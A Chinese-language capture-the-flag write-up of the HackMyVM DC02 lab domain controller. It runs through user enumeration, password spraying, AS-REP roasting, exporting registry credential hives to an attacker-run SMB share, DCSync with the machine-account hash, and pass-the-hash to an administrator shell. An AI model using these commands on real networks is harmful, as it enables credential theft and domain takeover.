HackMyVM-DC02

(Updated: )
靶机
,

DC02.

https://hackmyvm.eu/machines/machine.php?vm=DC02

Notes: Second DC from me. Enjoy it.

信息打点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
// 寻找靶机IP 126
nmap -sP 192.168.56.0/24                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 00:16 EST
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00049s latency).
MAC Address: 08:00:27:77:3D:23 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.126
Host is up (0.00028s latency).
MAC Address: 08:00:27:19:C5:0F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.99 seconds

// 端口扫描
nmap -sT -min-rate 10000 -p- 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 00:17 EST
Strange read error from 192.168.56.126 (104 - 'Connection reset by peer')
Nmap scan report for 192.168.56.126
Host is up (0.0014s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
MAC Address: 08:00:27:19:C5:0F (Oracle VirtualBox virtual NIC)

// 服务版本扫描
nmap -sT -sV -O -p- 192.168.56.126                              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 00:24 EST
Nmap scan report for 192.168.56.126                                                                                                                          
Host is up (0.00074s latency).                                                
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-20 20:26:28Z)                                                                 
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                   
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)                           
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0             
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)                           
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)         
9389/tcp  open  mc-nmf        .NET Message Framing                                                     
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                   
MAC Address: 08:00:27:19:C5:0F (Oracle VirtualBox virtual NIC)                
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                                        
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2016|11|10 (95%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10      
Aggressive OS guesses: Microsoft Windows Server 2022 (95%), Microsoft Windows Server 2016 (91%), Microsoft Windows 11 21H2 (90%), Microsoft Windows 10 (86%) 
No exact OS matches for host (test conditions non-ideal).                     
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

渗透

SMB

无任何凭据和线索,只能从SMB开始

当头一棒,不能使用匿名帐户,所以LDAP枚举用户也不能成功了

1
2
3
smbclient -L 192.168.56.126                                                    
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED

域内用户枚举

使用kerbrute 来枚举用户名,字典是github上找的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
./kerbrute_linux_amd64 userenum --dc 192.168.56.126 -d SOUPEDECODE.LOCAL ../../Dict/SecLists-2024.3/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/20/25 - Ronnie Flathers @ropnop

2025/01/20 01:06:36 >  Using KDC(s):
2025/01/20 01:06:36 >   192.168.56.126:88

2025/01/20 01:06:36 >  [+] VALID USERNAME:       admin@SOUPEDECODE.LOCAL
2025/01/20 01:06:36 >  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL
2025/01/20 01:06:36 >  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL
2025/01/20 01:06:37 >  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL
2025/01/20 01:06:37 >  [+] VALID USERNAME:       Admin@SOUPEDECODE.LOCAL
2025/01/20 01:06:39 >  [+] VALID USERNAME:       Administrator@SOUPEDECODE.LOCAL
2025/01/20 01:06:39 >  [+] VALID USERNAME:       CHARLIE@SOUPEDECODE.LOCAL
2025/01/20 01:06:53 >  [+] VALID USERNAME:       ADMIN@SOUPEDECODE.LOCAL
2025/01/20 01:09:22 >  [+] VALID USERNAME:       wreed11@SOUPEDECODE.LOCAL
2025/01/20 01:09:22 >  [+] VALID USERNAME:       kleo2@soupedecode.local
2025/01/20 01:09:22 >  [+] VALID USERNAME:       dc01@soupedecode.local

找到好几个用户,将结果保存为user.txt,使用脚本将用户名截取然后保存下来

1
2
3
4
5
6
with open('user.txt','r') as file1:
    data = file1.read()
    lines = data.splitlines()
with open('user.txt','w') as file2:
    for line in lines:
        file2.write(line[line.find('E:')+9:line.find('@')]+'\n')

尝试用户弱密码

使用crackmapexec来测试是否存在弱密码,发现charlie用户存在弱密码

1
2
3
4
5
6
7
8
9
10
11
12
13
crackmapexec smb 192.168.56.126 -u user.txt -p user.txt --continue-on-success --no-bruteforce
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\admin:admin STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\charlie:charlie 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\Charlie:Charlie STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\administrator:administrator STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\Admin:Admin STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\CHARLIE:CHARLIE STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\ADMIN:ADMIN STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS_LOGON_FAILURE 
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\dc01:dc01 STATUS_LOGON_FAILURE

得到密码后,就可以通过LDAP来枚举域内用户名了,将结果保存为res使用脚本截取出来

1
lookupsid.py 'SOUPEDECODE.LOCAL/charlie@192.168.56.126' > res
1
2
3
4
5
6
with open('res','r') as file:
    data = file.read()
    lines = data.splitlines()
with open('username.txt','w+') as file2:
    for line in lines:
        file2.write(line[line.find('\\') + 1:line.find('(')-1] + '\n')

然后再测试别的用户是否存在弱密码,结果还是只有charlie

1
2
crackmapexec smb 192.168.56.126 -u username.txt -p username.txt --continue-on-success --no-bruteforce | grep [+]
SMB                      192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\charlie:charlie

再次访问SMB

通过charlie用户去访问SMB

1
2
3
4
5
6
7
8
9
10
11
12
smbclient -L 192.168.56.126 -U SOUPEDECODE.LOCAL/charlie%charlie

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.126 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

最后发现SYSVOL里边存在东西,但是东西好像没用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
smbclient //192.168.56.126/SYSVOL -U SOUPEDECODE.LOCAL/charlie%charlie
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 15 15:21:21 2024
  ..                                  D        0  Sat Jun 15 15:21:21 2024
  SOUPEDECODE.LOCAL                  Dr        0  Sat Jun 15 15:21:21 2024

                12942591 blocks of size 4096. 10927852 blocks available
smb: \> cd SOUPEDECODE.LOCAL
smb: \SOUPEDECODE.LOCAL\> dir
  .                                   D        0  Sat Jun 15 15:30:47 2024
  ..                                  D        0  Sat Jun 15 15:21:21 2024
  DfsrPrivate                      DHSr        0  Sat Jun 15 15:30:47 2024
  Policies                            D        0  Sat Jun 15 15:21:30 2024
  scripts                             D        0  Sat Jun 15 15:21:21 2024

                12942591 blocks of size 4096. 10927852 blocks available

AS_REP Roasting

本来想尝试Kerbeoating的,但是拿不到SPN

1
2
3
4
GetUserSPNs.py SOUPEDECODE.LOCAL/charlie:charlie -dc-ip 192.168.56.126 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

No entries found!

看了下WP,发现可以通过 AS_REP Roasting 来进行下一步操作

通过 GetUserSPNs.py 枚举出关闭了预认证的用户

1
2
3
4
GetNPUsers.py -dc-ip 192.168.56.126 SOUPEDECODE.LOCAL/ -usersfile username.txt | grep 'SOUPEDECODE.LOCAL' 
/root/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:fecb2e188b7b15d1a4ed208f1c2e462b$3f348276b715378bf6aece608de90fa7134900b6439f45fbc3cd3081dad69bceb94c332b5de16f17e2beabe48da6f5809835b440002fdcb615f4bfa9f0041affd29bbdf6b425d48216d03c5cb624b646e366e3186a2ecfd6cbe2631ef6540094d238de54e4353055ecc2bc8694a3fe53e0a68b99f339311540ed0033dad48d23b59b8568355a6adc48fe221793024cfdec3c1acee051fde18bc455aef282d44c1c5388fadc5a4908b2b8c35a9cb8655d1db7189880541995043f5321306a3778105f6e2079ccad5111ac5589f490d32ce03c12006fce2722aeb10211529818cd2e7cbcaf82862261b58f0775eb9e224651164c55585e

将用户的hash加密后的Login session key进行破解

寻找密码类型,得知是18200

1
2
3
4
5
6
7
8
9
10
hashcat -h | grep Kerber  
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth                             | Network Protocol
  28800 | Kerberos 5, etype 17, DB                                   | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth                             | Network Protocol
  28900 | Kerberos 5, etype 18, DB                                   | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth                      | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP                               | Network Protocol

爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
hashcat -m 18200 '$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:fecb2e188b7b15d1a4ed208f1c2e462b$3f348276b715378bf6aece608de90fa7134900b6439f45fbc3cd3081dad69bceb94c332b5de16f17e2beabe48da6f5809835b440002fdcb615f4bfa9f0041affd29bbdf6b425d48216d03c5cb624b646e366e3186a2ecfd6cbe2631ef6540094d238de54e4353055ecc2bc8694a3fe53e0a68b99f339311540ed0033dad48d23b59b8568355a6adc48fe221793024cfdec3c1acee051fde18bc455aef282d44c1c5388fadc5a4908b2b8c35a9cb8655d1db7189880541995043f5321306a3778105f6e2079ccad5111ac5589f490d32ce03c12006fce2722aeb10211529818cd2e7cbcaf82862261b58f0775eb9e224651164c55585e' /usr/share/wordlists/rockyou.txt
//
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:fecb2e188b7b15d1a4ed208f1c2e462b$3f348276b715378bf6aece608de90fa7134900b6439f45fbc3cd3081dad69bceb94c332b5de16f17e2beabe48da6f5809835b440002fdcb615f4bfa9f0041affd29bbdf6b425d48216d03c5cb624b646e366e3186a2ecfd6cbe2631ef6540094d238de54e4353055ecc2bc8694a3fe53e0a68b99f339311540ed0033dad48d23b59b8568355a6adc48fe221793024cfdec3c1acee051fde18bc455aef282d44c1c5388fadc5a4908b2b8c35a9cb8655d1db7189880541995043f5321306a3778105f6e2079ccad5111ac5589f490d32ce03c12006fce2722aeb10211529818cd2e7cbcaf82862261b58f0775eb9e224651164c55585e:internet
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:fecb2e18...55585e
Time.Started.....: Mon Jan 20 02:30:05 2025 (1 sec)
Time.Estimated...: Mon Jan 20 02:30:06 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    39362 H/s (2.83ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/14344385 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> oooooo
Hardware.Mon.#1..: Util: 15%

的到密码 internet

再次访问SMB

经测试该用户可以访问其C

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbclient //192.168.56.126/C$ -U SOUPEDECODE.LOCAL/zximena448%internet
Try "help" to get a list of possible commands.
smb: \> ls
  $WinREAgent                        DH        0  Sat Jun 15 15:19:51 2024
  Documents and Settings          DHSrn        0  Sat Jun 15 22:51:08 2024
  DumpStack.log.tmp                 AHS    12288  Mon Jan 20 18:17:33 2025
  pagefile.sys                      AHS 1476395008  Mon Jan 20 18:17:33 2025
  PerfLogs                            D        0  Sat May  8 04:15:05 2021
  Program Files                      DR        0  Sat Jun 15 13:54:31 2024
  Program Files (x86)                 D        0  Sat May  8 05:34:13 2021
  ProgramData                       DHn        0  Sat Jun 15 22:51:08 2024
  Recovery                         DHSn        0  Sat Jun 15 22:51:08 2024
  System Volume Information         DHS        0  Sat Jun 15 15:02:21 2024
  Users                              DR        0  Mon Jun 17 14:31:08 2024
  Windows                             D        0  Sat Jun 15 15:21:10 2024

                12942591 blocks of size 4096. 10926158 blocks available
smb: \>

UserFlag

1
2
3
4
5
smb: \Users\zximena448\Desktop\> get user.txt
getting file \Users\zximena448\Desktop\user.txt of size 33 as user.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)

cat user.txt                             
2fe79eb0e02ecd4dd2833cfcbbdb504c

通过evil-winrm登陆不进去,可能无权限

域内信息收集

通过LdapDomainDump

1
2
3
4
5
6
ldapdomaindump SOUPEDECODE.LOCAL -u 'SOUPEDECODE.LOCAL\zximena448' -p 'internet'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

查看该用户信息,发现是Backup Operators 组的用户

1
2
cat domain_users.grep | grep zximena448
Zach Ximena     Zach Ximena     zximena448      Backup Operators        Domain Users    06/15/24 20:04:37       01/20/25 20:57:38       01/20/25 23:21:12   NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQ_PREAUTH     06/17/24 18:09:53       S-1-5-21-2986980474-46765180-2505414164-1142    Volunteer teacher and education advocate

网上看了关于Backup Operators 组,是Windows特权组,可以提取主机上的SAMSECURITYSYSTEM等文件

Backup Operators组的成员可以备份和恢复计算机上所有的文件,不论保护这些文件的权限是什么。Backup Operators也可以登录和关闭计算机。这个组不能被重命名,删除或者移动。默认情况下,这个内置的组没有成员,可以在域控上执行备份和恢复操作。

开启SMB服务器

1
smbserver.py -smb2support "someshare" "./"

使用impacket工具集中的reg 远程保存SAM注册表项

1
2
3
**reg.py "SOUPEDECODE.LOCAL"/"zximena448":"internet"@"192.168.56.126" save -keyName 'HKLM\SAM'  -o '\\192.168.56.4\someshare'
reg.py "SOUPEDECODE.LOCAL"/"zximena448":"internet"@"192.168.56.126" save -keyName 'HKLM\SECURITY'  -o '\\192.168.56.4\someshare'
reg.py "SOUPEDECODE.LOCAL"/"zximena448":"internet"@"192.168.56.126" save -keyName 'HKLM\SYSTEM'  -o '\\192.168.56.4\someshare'**

然后通过secretsdump.pySAMSECURITY转成HASH

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:81d6bd9d4f3393bea5ae2b72f672a394eab4830f35c0462e357af7eff5d951ace05b9d7967fcad00bacf6b599e76bbf49ac936c3219241f19c8563f9022d9e02f546dc5c26c03d9e8d1f42ad94fbeecd47efc6a572a94c7b70d437d327790385fe8b0297068c5b7e7140e4b0ab83c27dc5dc9658fe4df7bb7759efb1472b7ccaeb2a73b8341120e730749b5d5b6d6428ea23cae3f9f97e1d29777f63f700da98e68ce8cc2f98b3f5d3f0c0db0ee62c1d1616c4c603764546c658a778cf2f67c9e1c601ee63ee29bfdb5ae6790fcfd013038f1e0ebfaa303aed86e5c2dbf3c62b2aa4099ed6d37aceb9ecdf778af01f80
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:159de75b1e7662879be6482554b90e55
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM 
 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../...
 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!.
 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c.
 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up...

可以拿到administrator的NTLM

1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::

尝试登录,失败

1
2
3
crackmapexec smb 192.168.56.126 -u administrator -H 209c6174da490caeb422f3fa5a7ae634                    
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [-] SOUPEDECODE.LOCAL\administrator:209c6174da490caeb422f3fa5a7ae634 STATUS_LOGON_FAILURE

现在还存在机器账户的hash $MACHINE.ACC

1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:159de75b1e7662879be6482554b90e55

枚举看是哪台机子的哈希,得出来是DC01$

1
2
crackmapexec smb 192.168.56.126 -u username.txt -H 159de75b1e7662879be6482554b90e55
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\DC01$:159de75b1e7662879be6482554b90e55

得到是DC01$的hash后,再次进行secretsdump.py 获取Administrator的hash

1
2
3
4
5
secretsdump.py soupedecode.local/'DC01$'@192.168.56.126 -hashes ':159de75b1e7662879be6482554b90e55' | grep "Administrator"
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
Administrator:aes256-cts-hmac-sha1-96:01dc1e0f079f2dfe4a880156b7192acc658b8733cc87f1c5be32c291ad8e0318
Administrator:aes128-cts-hmac-sha1-96:4b4cf4064e92346339b1a3ef3ff65d6b
Administrator:des-cbc-md5:b0614357f8160ef4

HASH传递

拿到administratorNTLMhash后就可以进行传递了

1
2
3
crackmapexec smb 192.168.56.126 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
SMB         192.168.56.126  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         192.168.56.126  445    DC01             [+] SOUPEDECODE.LOCAL\Administrator:8982babd4da89d33210779a6c5b078bd (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
evil-winrm -i 192.168.56.126 -u 'administrator' -H '8982babd4da89d33210779a6c5b078bd'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

RootFlag

1
2
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
d41d8cd98f00b204e9800998ecf8427e